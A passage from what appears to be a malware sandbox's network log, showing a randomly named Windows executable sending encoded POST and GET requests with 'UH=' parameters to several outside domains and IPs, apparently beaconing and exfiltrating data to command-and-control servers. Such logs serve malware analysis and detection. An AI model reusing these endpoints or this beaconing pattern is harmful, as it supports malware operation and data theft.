Nov 24, 2024 08:06:27.294137001 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:06:27 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49802	45.141.156.114	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:28.655790091 CET	446	OUT	GET /ctvu/?UH=306z4jMFZ8cLvHYZzZU9cUs0vQ86MCVOzz9oMF1ntEZl1SQIBC+VKPA8lqMh/UdrcskgnhZVBAq8zTFw0YpHZLk0gMEW/A5vkbohwDElcVcFHGXrgZJpQIM=&E2ThV=44spoH HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.logidant.xyz User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Nov 24, 2024 08:06:30.005597115 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:06:29 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49818	154.23.184.194	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:35.942172050 CET	704	OUT	POST /bryf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 199 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.wcq77.top Origin: http://www.wcq77.top Referer: http://www.wcq77.top/bryf/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 50 43 78 44 55 6d 72 38 45 76 69 67 52 79 70 6d 72 52 78 47 6a 43 4d 45 33 67 49 6a 64 2f 72 50 4e 50 41 74 2f 71 66 4e 74 74 77 63 6a 31 36 78 31 57 72 72 39 54 34 4b 65 69 53 79 41 30 30 37 79 31 68 70 72 42 52 34 5a 42 79 52 64 70 63 74 66 72 48 36 51 34 2f 41 36 7a 6a 31 35 55 56 4a 6d 69 2b 65 42 35 6c 44 38 6c 42 30 6f 75 59 39 67 41 56 38 4f 64 73 63 32 78 39 4a 39 41 4e 77 76 74 39 44 39 61 6b 71 30 77 75 7a 7a 79 42 55 73 4d 5a 34 4b 34 75 32 78 2b 79 53 64 4f 31 75 68 4d 58 59 51 57 64 67 49 35 64 69 53 6e 59 32 73 6b 63 62 6e 68 72 57 75 4a 78 58 32 2b 51 38 74 41 3d 3d Data Ascii: UH=PCxDUmr8EvigRypmrRxGjCME3gIjd/rPNPAt/qfNttwcj16x1Wrr9T4KeiSyA007y1hprBR4ZByRdpctfrH6Q4/A6zj15UVJmi+eB5lD8lB0ouY9gAV8Odsc2x9J9ANwvt9D9akq0wuzzyBUsMZ4K4u2x+ySdO1uhMXYQWdgI5diSnY2skcbnhrWuJxX2+Q8tA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49824	154.23.184.194	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:38.613251925 CET	724	OUT	POST /bryf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 219 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.wcq77.top Origin: http://www.wcq77.top Referer: http://www.wcq77.top/bryf/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 50 43 78 44 55 6d 72 38 45 76 69 67 44 48 35 6d 70 77 78 47 69 69 4d 4c 37 41 49 6a 45 76 72 54 4e 50 4d 74 2f 76 76 64 74 66 6b 63 74 33 69 78 30 58 72 72 2b 54 34 4b 56 43 53 33 45 30 30 67 79 31 64 48 72 42 74 34 5a 42 6d 52 64 6f 73 74 63 59 76 35 51 6f 2f 43 79 54 6a 7a 30 30 56 4a 6d 69 2b 65 42 35 78 70 38 6c 4a 30 6f 39 51 39 67 69 39 2f 41 39 73 66 67 42 39 4a 35 41 4e 38 76 74 39 6c 39 62 4a 4e 30 79 57 7a 7a 33 39 55 73 39 5a 33 54 49 75 30 73 4f 7a 43 4d 66 63 6a 67 39 69 6e 65 77 46 7a 42 64 4e 42 54 68 56 73 39 56 39 4d 31 68 50 6c 7a 4f 34 6a 37 39 74 31 32 45 79 48 49 58 70 71 65 45 4b 71 36 78 74 4f 39 68 33 78 79 72 30 3d Data Ascii: UH=PCxDUmr8EvigDH5mpwxGiiML7AIjEvrTNPMt/vvdtfkct3ix0Xrr+T4KVCS3E00gy1dHrBt4ZBmRdostcYv5Qo/CyTjz00VJmi+eB5xp8lJ0o9Q9gi9/A9sfgB9J5AN8vt9l9bJN0yWzz39Us9Z3TIu0sOzCMfcjg9inewFzBdNBThVs9V9M1hPlzO4j79t12EyHIXpqeEKq6xtO9h3xyr0=
Nov 24, 2024 08:06:40.129363060 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:06:39 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a7b148-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49832	154.23.184.194	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:41.278610945 CET	10806	OUT	POST /bryf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 10299 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.wcq77.top Origin: http://www.wcq77.top Referer: http://www.wcq77.top/bryf/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 50 43 78 44 55 6d 72 38 45 76 69 67 44 48 35 6d 70 77 78 47 69 69 4d 4c 37 41 49 6a 45 76 72 54 4e 50 4d 74 2f 76 76 64 74 66 38 63 74 47 43 78 31 30 7a 72 2f 54 34 4b 4f 69 53 32 45 30 31 77 79 31 31 4c 72 42 68 43 5a 43 65 52 63 4b 6b 74 58 4a 76 35 62 6f 2f 43 77 54 6a 79 35 55 55 4c 6d 6d 69 61 42 35 68 70 38 6c 4a 30 6f 38 41 39 6d 77 56 2f 43 39 73 63 32 78 38 47 39 41 4d 72 76 74 6c 62 39 62 4d 36 30 42 65 7a 39 33 4e 55 38 66 78 33 61 49 75 71 76 4f 79 48 4d 66 42 6a 67 39 2f 55 65 77 5a 64 42 61 39 42 52 31 63 49 35 42 31 42 74 44 72 42 72 35 6b 62 38 64 70 58 2f 31 47 74 50 47 68 4d 64 51 53 33 69 68 35 46 71 45 71 31 75 63 55 48 71 50 70 70 77 62 5a 58 6a 67 41 76 54 73 38 2b 35 6f 6c 37 49 66 58 68 73 50 44 61 31 74 57 74 65 6f 2f 55 52 55 49 76 52 39 36 51 73 2f 51 5a 46 51 4e 4e 52 62 6f 79 38 6f 44 6c 71 6d 35 74 32 66 51 73 37 67 62 67 67 54 37 5a 77 62 79 39 6a 73 44 7a 48 76 77 6d 76 66 35 58 6a 57 64 6e 64 36 34 7a 67 71 4d 59 59 65 2f 2b 48 6b 71 5a 35 33 68 2f 76 62 76 [TRUNCATED] Data Ascii: UH=PCxDUmr8EvigDH5mpwxGiiML7AIjEvrTNPMt/vvdtf8ctGCx10zr/T4KOiS2E01wy11LrBhCZCeRcKktXJv5bo/CwTjy5UULmmiaB5hp8lJ0o8A9mwV/C9sc2x8G9AMrvtlb9bM60Bez93NU8fx3aIuqvOyHMfBjg9/UewZdBa9BR1cI5B1BtDrBr5kb8dpX/1GtPGhMdQS3ih5FqEq1ucUHqPppwbZXjgAvTs8+5ol7IfXhsPDa1tWteo/URUIvR96Qs/QZFQNNRboy8oDlqm5t2fQs7gbggT7Zwby9jsDzHvwmvf5XjWdnd64zgqMYYe/+HkqZ53h/vbvTTSr/fd/6OTcccy0x92IDbaYfvh9SjqE8RsZytrhveuniQxVq+egkh6WcvmuG2r21rsHPFPrp8RPj4tY5owrd2ylUaye63jydkPYOvrM/GugITcP+Apv7d9f2qYyWAukp8n8bxL61aHaVSfGTPUtC56KTwYaBp2iPiWC8yDzVzTMkGEhr69jjUsL/Wr4+rJ4yEqC7do12BJC0mulHkQTVihFdyrx3oVC48sbdzIak/Z6vQpy3atgK85DAqrBpmN+OCZb9ZFhXy4ijMSIgSOGYBd7QWCdifE3bsfByvWtJ9x++kX0uwx+iDD9ARQ6KgXQ5mCnrB1GEhpUxj10jYKiCh8kk+6+1rfNpqlWXhvm07bFCa7AsfGBHZqiRDKVzPqDnOabK3dGJ9Y+HOMCEUXrogecL/4f2tO5Anwv8VjBpH+/CH2vADjV553ZlDZ4F0E0G0G7kT6fw9stS/uvCmgs55xMAPdJ+6IBjSEKftZ2fXMaA+MgnaFE4pvwgrD5S5JuDrFqjrlag7ewyQplrYRKSzL3DEuA4DT/JS9G20Dx4RrJBiAITYMq+V5ohynKJgxNbZ87lNF2tMdgVhIvtw/KXun8IoHce0kihYmikChatDLMD2TIjyWgc2TNsMwZhGCIBoa9R3byZOj+kOKCwjBFQgbCqI5oLwArpZ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49840	154.23.184.194	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:43.953239918 CET	443	OUT	GET /bryf/?UH=CAZjXQbNTKeWQTQirDs1igUBzSQld6T1UeVU1dDfkJwpgmj9+23WxzoueliXKU0GrnZ7rAlARHmYQrQtVPfpR7ul/yvYu09c5TuBMIpg21kSx+UgpigqKqQ=&E2ThV=44spoH HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.wcq77.top User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Nov 24, 2024 08:06:45.579416990 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:06:45 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a7b148-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49857	209.74.77.108	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:51.146190882 CET	719	OUT	POST /grm8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 199 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.mindfulmo.life Origin: http://www.mindfulmo.life Referer: http://www.mindfulmo.life/grm8/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 47 56 32 6f 56 70 48 78 4e 39 77 61 77 6b 4b 54 4e 39 71 52 6e 43 79 73 54 4a 2f 78 39 4c 56 32 52 41 33 30 49 49 51 48 6c 52 30 37 36 69 4b 61 45 67 6d 51 33 2f 44 4d 4e 77 2b 2b 62 51 35 70 35 4b 75 67 6b 57 34 47 36 30 54 42 75 6a 6e 38 7a 5a 4c 79 56 59 46 45 55 30 64 55 36 73 66 43 56 76 34 63 52 4e 34 41 48 47 2f 30 2b 70 44 51 62 4e 6a 69 7a 47 55 45 50 48 32 33 48 61 42 38 4b 76 59 30 67 30 43 6a 51 34 72 71 69 47 76 4c 6a 57 79 32 4c 36 4f 58 42 37 38 5a 47 78 39 6a 4c 4b 59 66 30 58 63 75 35 47 75 69 35 51 57 36 61 49 45 51 4b 4d 64 32 77 63 4f 59 52 58 67 38 63 41 3d 3d Data Ascii: UH=GV2oVpHxN9wawkKTN9qRnCysTJ/x9LV2RA30IIQHlR076iKaEgmQ3/DMNw++bQ5p5KugkW4G60TBujn8zZLyVYFEU0dU6sfCVv4cRN4AHG/0+pDQbNjizGUEPH23HaB8KvY0g0CjQ4rqiGvLjWy2L6OXB78ZGx9jLKYf0Xcu5Gui5QW6aIEQKMd2wcOYRXg8cA==
Nov 24, 2024 08:06:52.402002096 CET	533	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:06:52 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49863	209.74.77.108	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:53.811377048 CET	739	OUT	POST /grm8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 219 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.mindfulmo.life Origin: http://www.mindfulmo.life Referer: http://www.mindfulmo.life/grm8/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 47 56 32 6f 56 70 48 78 4e 39 77 61 7a 45 36 54 4f 65 79 52 67 69 79 6a 57 4a 2f 78 30 72 56 71 52 41 37 30 49 4a 6b 78 6c 6e 6b 37 30 6e 32 61 46 68 6d 51 37 66 44 4d 5a 67 2b 33 55 77 35 75 35 4b 69 6f 6b 58 55 47 36 33 76 42 75 6a 58 38 79 75 58 78 56 49 46 4b 66 55 64 57 2b 73 66 43 56 76 34 63 52 4e 38 71 48 47 58 30 2f 61 72 51 42 76 4c 39 74 57 55 48 49 48 32 33 44 61 42 34 4b 76 59 7a 67 31 65 5a 51 37 44 71 69 44 72 4c 67 48 79 33 41 36 4f 52 50 62 39 79 4a 43 45 63 49 49 68 4f 2b 30 45 35 78 32 36 6a 34 57 62 67 4c 35 6c 48 59 4d 35 46 74 62 48 73 63 55 64 31 48 42 34 45 46 49 54 2f 77 61 4f 63 74 78 78 38 74 5a 53 70 34 68 55 3d Data Ascii: UH=GV2oVpHxN9wazE6TOeyRgiyjWJ/x0rVqRA70IJkxlnk70n2aFhmQ7fDMZg+3Uw5u5KiokXUG63vBujX8yuXxVIFKfUdW+sfCVv4cRN8qHGX0/arQBvL9tWUHIH23DaB4KvYzg1eZQ7DqiDrLgHy3A6ORPb9yJCEcIIhO+0E5x26j4WbgL5lHYM5FtbHscUd1HB4EFIT/waOctxx8tZSp4hU=
Nov 24, 2024 08:06:55.065120935 CET	533	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:06:54 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49869	209.74.77.108	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:56.494527102 CET	10821	OUT	POST /grm8/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 10299 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.mindfulmo.life Origin: http://www.mindfulmo.life Referer: http://www.mindfulmo.life/grm8/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 47 56 32 6f 56 70 48 78 4e 39 77 61 7a 45 36 54 4f 65 79 52 67 69 79 6a 57 4a 2f 78 30 72 56 71 52 41 37 30 49 4a 6b 78 6c 6e 73 37 30 52 43 61 45 43 4f 51 36 66 44 4d 61 67 2b 79 55 77 34 72 35 4f 47 73 6b 58 6f 34 36 79 6a 42 74 41 76 38 36 2f 58 78 4d 34 46 4b 43 45 64 56 36 73 65 57 56 76 4a 56 52 4e 73 71 48 47 58 30 2f 63 58 51 50 74 6a 39 76 57 55 45 50 48 32 42 48 61 42 55 4b 75 77 46 67 31 4b 7a 51 4b 6a 71 6c 6a 37 4c 76 56 61 33 4e 36 4f 54 43 37 39 71 4a 44 34 39 49 49 39 43 2b 33 59 66 78 30 6d 6a 37 69 75 52 62 59 4e 6e 50 4c 42 55 75 34 37 33 48 30 56 5a 4d 54 59 4f 4f 64 4c 31 72 2b 36 6a 77 6a 63 70 79 38 2b 73 6d 45 35 43 2b 2f 65 78 56 4f 56 79 70 63 42 50 34 46 68 74 50 73 62 30 45 33 65 64 36 77 42 32 70 49 77 4f 4b 66 6d 41 78 53 67 72 79 47 79 43 47 63 54 66 2f 7a 75 54 4f 68 77 2b 67 74 5a 57 69 49 58 6d 6e 4e 79 51 63 73 48 52 66 41 54 76 76 6e 53 70 73 36 46 2f 52 7a 6b 5a 33 4a 34 33 44 38 55 41 44 70 61 76 65 38 4f 42 31 51 67 43 4d 33 58 6c 75 61 57 43 49 57 79 [TRUNCATED] Data Ascii: UH=GV2oVpHxN9wazE6TOeyRgiyjWJ/x0rVqRA70IJkxlns70RCaECOQ6fDMag+yUw4r5OGskXo46yjBtAv86/XxM4FKCEdV6seWVvJVRNsqHGX0/cXQPtj9vWUEPH2BHaBUKuwFg1KzQKjqlj7LvVa3N6OTC79qJD49II9C+3Yfx0mj7iuRbYNnPLBUu473H0VZMTYOOdL1r+6jwjcpy8+smE5C+/exVOVypcBP4FhtPsb0E3ed6wB2pIwOKfmAxSgryGyCGcTf/zuTOhw+gtZWiIXmnNyQcsHRfATvvnSps6F/RzkZ3J43D8UADpave8OB1QgCM3XluaWCIWyL1xLxCsxOQqtEFusYwGDzGAMu2xVvZlT1wciuJkqkK+vSiH8BeuszThNYC8mSPLi41jjEzX81YuZX+DRLxb69JWPaGZPUBwICl4VrKjIAIFvbF2mjQjFWHHx20mMJJn+M/hDpia12GZjgrzz25W/KvUMKrqOlyF3PZzynYwMZP4Rr3wLG0Eiijz0CpGRvA8E6YXuF2+QDI8bDFHbxxKHmRAwoL7g3Tx/Z1q6q2LQ3aaQJ1XvKKUYnkO0PH7R287p4no4Hn2fYf1iFWgnWAugAImRq1AIXqfmVPYMRg38kfAl1Pa2xxNBvL2z32AVSzUeTOUVj2r1zJipY9CCbc03Iu3VGWgimmzvs9V6gRujgZqq+omjKD3+lPCtvtxB6NlVjz7bsFLMdiidE2a0NjnwebwkkmEHRAtNVYVT7sQtSvYeVCEJ5VXoCNykq1rOvs4fgypAxUYCJmUbaclX11F4Jnj4OGQCkgX2ZbxxPtn7JESXXuO2iWdIqakdqdFsMdlSmM9UqltUCT39Shl42prckA4NDNRigcmOiOc/nEO39H5vjnL6Io+FR4QVoFxnxV09SMD/9M6DqamiB2MxBC0aw/JqZnsL2lWZ+hiSJz2MzdDNF0h866ESr61Ri3o0+6myEfWQMHmrBtbfDS7Wfq5fhRwuSppHmLDzo3 [TRUNCATED]
Nov 24, 2024 08:06:57.858057976 CET	533	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:06:57 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 